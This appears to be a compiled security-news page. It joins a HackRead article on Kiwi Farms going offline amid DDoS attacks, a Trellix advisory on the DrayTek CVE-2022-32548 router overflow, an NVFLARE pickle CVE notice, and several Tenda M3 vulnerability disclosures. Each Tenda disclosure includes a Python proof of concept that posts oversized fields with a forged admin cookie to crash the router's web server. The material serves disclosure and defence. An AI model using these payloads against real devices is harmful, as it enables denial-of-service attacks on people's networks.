By Waqas
According to Kiwi Farms, prior to service disruption, the forum was targeted by a "DDoS attack and other forms of attempted network intrusion."
This is a post from HackRead.com Read the original post: Kiwi Farms Goes Offline amid DDoS Attack and Hosting Issues

Kiwi Farms is a website that hosts user-generated content and discussion forums. The site has been accused of doxing, harassment, and cyberbullying. Kiwi Farms has been banned from several social media platforms and domain providers.

However, since August 26th, 2022, Kiwi Farms has been offline and displaying a note uploaded by its administrators which explains why the website is down and how they have been suffering DDoS (distributed denial of service) and other forms of cyber attacks.

> The forum is down because upstream ISPs have blackholed routes to our network. When a computer tries to connect to our servers, the global network has no way to reach them. This is a deliberate action from our host. They are not answering my emails and I do not know why this has been done.
> 
> Kiwi Farms

According to Kiwi Farms, prior to service disruption, the forum was targeted by a “DDoS attack and other forms of attempted network intrusion.” The forum’s administrators believe that it was due to these malicious attacks and to protect other customers the ISP was forced to block their site.

Message on Kiwi Farms at the time of writing this article

**So Why is Kiwi Farms Such a Target?**

The website is known for doxxing – or publishing personal information – of people, it deems “incels” (involuntary celibates), feminists, social justice warriors, and others. Some believe the site goes out of its way to harass and humiliate people.

On August 5, 2022, Clara Sorrenti (aka Keffals), a Twitch streamer and transgender activist from Canada was swatted and arrested in London, Ontario. Days later, Keffals’ hotel address and location were leaked on Kiwi Farms.

Given the kind of content, Kiwi Farms publishes, it’s not surprising that the site would be targeted by those who don’t agree with its tactics.

**Who DDoSd Kiwi Farms?**

Although it is unclear who was behind the DDoS attack against Kiwi Farms, @YourAnonNews, the largest social media representative of the Anonymous movement also tweeted about the incident.

However, they told _Hackread.com_ that at this moment there is no confirmation whether Anonymous hacktivists were behind the attack.

> "However, prior to going down, we were being targeted by a DDoS attack and other forms of attempted network intrusion."
> 
> Awwwwwwwwww. Poor Kiwifarms. Always the helpless victim.https://t.co/iiAWjiZ4e3
> 
> — Anonymous (@YourAnonNews) August 27, 2022

**Kiwi Farms and Cloudflare**

Cloudflare, as we know it, provides security and DDoS protection to websites. It also provides services to Kiwi Farms and since the site has been accused of doxing or publishing private information about individuals without their consent; its critics want the security firm to remove its protection.

For your information, **in August 2017**, Cloudflare was quick to remove the racist and neo-nazi website DailyStormer from its platform. **In August 2019**, the infamous messageboard 8chan accused of spreading hateful content against minorities and people of color was booted off by its hosting company Voxility, while Cloudflare removed its protection soon after.

However, at this moment there has been no statement from Cloudflare over the content Kiwi Farms has been accused of posting. Here are some of the tweets urging and pressurizing Cloudflare “Drop Kiwi Farm” from its platform:

> We’ve gotten Kiwifarms to trend for three days. Cloudflare doesn’t care how many suicides the website they support causes, but they do care if this becomes a PR nightmare that hurts their bottom line. Please get #CloudflareProtectsTerrorists and #DropKiwifarms to trend.
> 
> — keffals #DropKiwifarms (@keffals) August 22, 2022

Tweet from Hashtag: DropKiwifarms

Tweet from Hashtag: DropKiwifarms

> TW: suicide
> 
> Near was the author of groundbreaking emulators: bsnes, higan, ares. They were an inspiration for many of us in the emulation scene. Last year they committed suicide after suffering from online harassment for too long.@Cloudflare, put a stop to this. #dropkiwifarms https://t.co/nnABgJJlGm
> 
> — Dolphin Emulator (@Dolphin\_Emu) August 22, 2022

Tweet from Hashtag: DropKiwifarms

You can find more tweets from the hashtag DropKiwifarms **here**.

1.  **Man accused of hiring hitman on dark web to kill ex-girlfriend**
2.  **Hackers using smart home devices to live stream swatting attacks**
3.  **Victim of Swatting: Police kill Innocent man after CoD gamer prank call**
4.  **Bitcoin exchange hit by DDoS attacks after the kidnapping of its official**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Kiwi Farms Goes Offline amid DDoS Attack and Hosting Issues

An issue was discovered on certain DrayTek Vigor routers before July 2022 such as the Vigor3910 before 4.3.1.1. /cgi-bin/wlogin.cgi has a buffer overflow via the username or password to the aa or ab field.

**Summary**

The Trellix Threat Labs Vulnerability Research team has found an unauthenticated remote code execution vulnerability, filed under CVE-2022-32548 affecting multiple DrayTek routers. The attack can be performed without user interaction if the management interface of the device has been configured to be internet facing. A one-click attack can also be performed from within the LAN in the default device configuration. The attack can lead to a full compromise of the device and may lead to a network breach and unauthorized access to internal resources. All the affected models have a patched firmware available for download on the vendor’s website.

**Introduction**

DrayTek is a Taiwanese company that manufactures Small Office and Home Office (SOHO) routers with a wide adoption in the UK, Vietnam, Taiwan, etc. (src: Shodan).

**Figure 1. Shodan search showing DrayTek devices used throughout the world**

With many businesses implementing work from home policies over the last two years, these affordable devices offer an easy way for Small and Medium Sized Businesses (SMBs) to provide VPN access to their employees. For this reason, we decided to look into the security of one of their flagship products, the Vigor 3910, and found a pre-authentication remote code execution vulnerability affecting the Vigor 3910 and 28 other DrayTek models sharing the same codebase (see Affected Devices below). Exploiting this vulnerability can lead to a complete compromise of the device and can enable a malicious actor to access internal resources of the breached networks.

During our research we uncovered over 200k devices which have the vulnerable service currently exposed on the internet and would require no user interaction to be exploited. Many more devices where the affected service is not exposed externally are still vulnerable to a one-click attack from the LAN. This vulnerability is tracked by MITRE as CVE-2022-32548 with a CVSS 3.0 score of 10.0. A patch has already been released by the manufacturer. If you or your organization are managing DrayTek devices, we recommend that you visit the manufacturer website and apply the patch as soon as possible.

We also applaud DrayTek for their great responsiveness and the release of a patch less than 30 days after we disclosed the vulnerability to their security team. This type of responsiveness and relationship shows true organization maturity and drive to improve security across the entire industry.

**Figure 2. A DrayTek Vigor 3910**

**Vulnerable devices**

The vulnerable devices are as follow:

Vigor3910 < 4.3.1.1  
Vigor1000B < 4.3.1.1  
Vigor2962 Series < 4.3.1.1  
Vigor2927 Series < 4.4.0  
Vigor2927 LTE Series < 4.4.0  
Vigor2915 Series < 4.3.3.2  
Vigor2952 / 2952P < 3.9.7.2  
Vigor3220 Series < 3.9.7.2  
Vigor2926 Series < 3.9.8.1  
Vigor2926 LTE Series < 3.9.8.1  
Vigor2862 Series < 3.9.8.1  
Vigor2862 LTE Series < 3.9.8.1  
Vigor2620 LTE Series < 3.9.8.1  
VigorLTE 200n < 3.9.8.1  
Vigor2133 Series < 3.9.6.4  
Vigor2762 Series < 3.9.6.4  
Vigor165 < 4.2.4  
Vigor166 < 4.2.4  
Vigor2135 Series < 4.4.2  
Vigor2765 Series < 4.4.2  
Vigor2766 Series < 4.4.2  
Vigor2832 < 3.9.6  
Vigor2865 Series < 4.4.0  
Vigor2865 LTE Series < 4.4.0  
Vigor2866 Series < 4.4.0  
Vigor2866 LTE Series < 4.4.0  

**Impact**

The compromise of a network appliance such as the Vigor 3910 can lead to the following outcomes (the following is a non-exhaustive list presented in no particular order):

*   Leak of the sensitive data stored on the router (keys, administrative passwords, etc.)
*   Access to the internal resources located on the LAN that would normally require VPN-access or be present “on the same network”
*   Man in the middle of the network traffic
*   Spying on DNS requests and other unencrypted traffic directed to the internet from the LAN through the router
*   Packet capture of the data going through any port of the router
*   Botnet activity (DDoS, hosting malicious data, etc.)
*   Leak of the sensitive data stored on the router (keys, administrative passwords, etc.)

Failed exploitation attempts can lead to:

*   Reboot of the device
*   Denial of Service of affected devices
*   Other possible abnormal behavior

Trellix Threat Labs is not currently aware of any signs of exploitation of this vulnerability in the wild; however, DrayTek devices were recently targeted by various known malicious actors. This was highlighted in the CISA’s memo on the People Republic of China (PRC) compromising SOHO routers and the report from Black Lotus Labs on the ZuoRAT exploiting the Vigor 3900 (end-of-life device replaced by the Vigor 3910). The nature of CVE-2022-32548 makes it harder to exploit compared to past vulnerabilities affecting DrayTek devices, which may hinder threat actors from quickly adopting this vulnerability into their attack frameworks.

**Demo video**

The following demo video highlights how an attacker could compromise a Draytek router and pivot to internal resources in a mock-network we’ve created.

**Technical details**

The web management interface of the vulnerable DrayTek devices is affected by a buffer overflow on the login page at **/cgi-bin/wlogin.cgi.** An attacker may supply carefully crafted username and/or password as base64 encoded strings inside the fields **aa** and **ab** of the login page. This would cause the buffer overflow to trigger due to a logic bug in the size verification of these encoded strings. By default, this attack is reachable on the LAN and may be reachable via the internet (WAN) as well if the user has enabled remote web management on their device. The consequence of this attack is a takeover of the so called “DrayOS” that implements the router functionalities. On devices that have an underlying Linux operating system (such as the Vigor 3910) it is then possible to pivot to the underlying operating system and establish a reliable foothold on the device and local network. Devices that are running the DrayOS as a bare-metal operating system will be harder to compromise as it requires that an attacker has better understanding of the DrayOS internals.

We will release more details as of how this bug was found and exploited in our upcoming talk at Hexacon on October 14-15, 2022 and the follow-up blog post that we will publish alongside the presentation.

**Detection**

Exploitation attempts can be detected by logging/alerting when a malformed base64 string is sent via a POST request to the **/cgi-bin/wlogin.cgi** end-point on the web management interface router. Base64 encoded strings are expected to be found in the **aa** and **ab** fields of the POST request. Malformed base64 strings indicative of an attack would have an abnormally high number of %3D padding. Any number over three should be considered suspicious.

The Trellix Network Security Platform has additionally released rules for exploitation attempts of this vulnerability under the identifier, _DrayTek CVE-2022-32548 Buffer Overflow Attempt._

**Recommendation**

We provide the following recommendations to those potentially affected by a vulnerable DrayTek router:

*   Make sure the latest firmware is deployed to your device. You can find the latest firmware by visiting the website of the manufacturer.
*   In the management interface of the device, verify that port mirroring, DNS settings, authorized VPN access and any other relevant settings have not been tampered with.
*   Do not expose the management interface to the Internet unless absolutely required. If you do, make sure you enable 2FA and IP restriction to minimize the risk of an attack.
*   Change the password of affected devices and revoke any secret stored on the router that may have been leaked.

**Conclusion**

Edge devices, such as the Vigor 3910 router, live on the boundary between internal and external networks. As such they are a prime target for cybercriminals and threat actors alike. Remotely breaching edge devices can lead to a full compromise of the businesses’ internal network. This is why it is critical to ensure these devices remain secure and updated and that vendors producing edge devices have processes in place for quick and efficient response following vulnerability disclosure, just as DrayTek did. Stay tuned for our next article on DrayTek routers where we will present the process used to uncover this vulnerability.

_This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. Trellix conducts research in accordance with its Vulnerability Reasonable Disclosure Policy | Trellix. Any attempt to recreate part or all of the activities described is solely at the user’s risk, and neither Trellix nor its affiliates will bear any responsibility or liability._

CVE-2022-32548: Unauthenticated Remote Code Execution in a Wide Range of DrayTek Vigor Routers

NVFLARE, versions prior to 2.1.4, contains a vulnerability that deserialization of Untrusted Data due to Pickle usage may allow an unprivileged network attacker to cause Remote Code Execution, Denial Of Service, and Impact to both Confidentiality and Integrity.

**Impact**

NVFLARE contains a vulnerability in its DXO module, where deserialization of Untrusted Data due to Pickle usage may allow an unprivileged network attacker to cause Remote Code Execution, Denial Of Service, and Impact to both Confidentiality and Integrity.

All versions before 2.1.4 are affected.

CVSS Score = 9.8

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Patches**

The patch is included in nvflare==2.1.4  
This new version uses MessagePack instead of Pickle to do serialization and deserialization.

Some object serializations supported by Pickle are not supported by MessagePack. We have provided out of box support for some built-in NVFLARE objects. For object serializations unsupported by MessagePack, the user will need to convert the objects to numpy or bytes before sending over to remote machines. The list of supported object types are listed in https://github.com/NVIDIA/NVFlare/blob/2.1/nvflare/fuel/utils/fobs/README.rst

**Workarounds**

No workarounds available.

**Additional information**

Issue Found by: Oliver Sellwood (Nintorac) and Elias Hohl

CVE-2022-34668: NVFLARE unsafe deserialization due to Pickle

Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow vulnerability in the function formSetAdConfigInfo. This vulnerability allows attackers to cause a Denial of Service (DoS) via the authIPs parameter.

**Tenda M3 contains Stack Overflow Vulnerability****overview**

*   type: stack overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a stack buffer overflow. The vunlerability is in fucntion formSetAdConfigInfo

In this function, is copies POST parameter authIPs to stack buffer without checking its length, causing a stack buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "authIPs": "a"\*0x1000
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setAdConfigInfo", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-38567: Vuln/Tenda M3/formSetAdConfigInfo_ at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formEmailTest. This vulnerability allows attackers to cause a Denial of Service (DoS) via the mailname parameter.

**Tenda M3 contains heap buffer Overflow Vulnerability****overview**

*   type: heap buffer overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formEmailTest

It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameter mailname to heap buffer.

v3 is the length of mailname, but it doesn’t limit it. so if v3>0x28C, the memcpy(v1, v2, v3) will cause heap buffer overflow

but it can cause segmentation fault when execute memcpy(v1, v2, v3)

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "mailname": "@"+"a"\*0x600, 
    "mailpwd": "a"
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/testEmail", data\=data, cookies\=cookies)
print(res.content)

we can see the size of dest is 0x291 and size of src is 0x600

CVE-2022-38566: Vuln/Tenda M3/formEmailTest-mailname at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formSetFixTools. This vulnerability allows attackers to cause a Denial of Service (DoS) via the MACAddr parameter.

**Tenda M3 contains heap Overflow Vulnerability****overview**

*   type: heap overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formSetFixTools

It calls malloc(0x28) to allocate heap buffer, and it copies POST parameterMACAddr tp heap buffer.

It didn’t check the value of v23 and calls strncpy, so there is a heap overflow.

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service) **(We need to send request twice)**

import requests

data \= {
    "networkTool": "3",
	"operation": "start", 
	"MACAddr": "a"\*0x800
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setFixTools", data\=data, cookies\=cookies)
print(res.content)
res \= requests.post("http://127.0.0.1/goform/setFixTools", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-38563: Vuln/Tenda M3/formSetFixTools_Mac at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formEmailTest. This vulnerability allows attackers to cause a Denial of Service (DoS) via the mailpwd parameter.

**Tenda M3 contains heap buffer Overflow Vulnerability****overview**

*   type: heap buffer overflow vulnerability
*   supplier: Tenda https://www.tenda.com
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
*   affect version: TendaM3 v1.0.0.12(4856)

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formEmailTest

It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameter mailpwd to heap buffer.

v5 is the length of mailpwd, but it doesn’t limit it. so if v5>0x28C, the memcpy(v4, v20, v5) will cause heap buffer overflow

The progarm crashed when call malloc, the stack frame is below.

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "mailname": "@", 
    "mailpwd": "b"\*0x400
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/testEmail", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-38565: Vuln/Tenda M3/formEmailTest-mailpwd at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formSetFixTools. This vulnerability allows attackers to cause a Denial of Service (DoS) via the hostname parameter.

**Tenda M3 contains heap Overflow Vulnerability****overview**

*   type: heap overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formSetFixTools

It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameterhostname tp heap buffer.

If v3 > 0x50, that will cause heap overflow due to strncpy(v1, v2, c3)

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "networkTool": "1", 
	"hostName": "a"\*0x100
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setFixTools", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-38568: Vuln/Tenda M3/formSetFixTools_hostname at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formSetFixTools. This vulnerability allows attackers to cause a Denial of Service (DoS) via the lan parameter.

**Tenda M3 contains heap Overflow Vulnerability****overview**

*   type: heap overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formSetFixTools

It calls malloc(0x28) to allocate heap buffer, and it copies POST parameterlan tp heap buffer.

It didn’t check the value of v23 and calls strncpy, so there is a heap overflow.

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "networkTool": "3",
	"operation": "start", 
	"lan": "a"\*0x100
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setFixTools", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-38562: Vuln/Tenda M3/formSetFixTools_lan at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a buffer overflow vulnerability in the function formSetPicListItem. This vulnerability allows attackers to cause a Denial of Service (DoS) via the adItemUID parameter.

**Tenda M3 contains Buffer Overflow Vulnerability****overview**

*   type: buffer overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a buffer overflow. The vunlerability is in fucntion formSetPicListItem

In this function, it copies POST parameter adItemUID to buffer in .bss

If v21 is too long, it will causes dos(deny of service)

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "adItemUID": "a"\*0x2000
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setPicListItem", data\=data, cookies\=cookies)
print(res.content)

Tag

#dos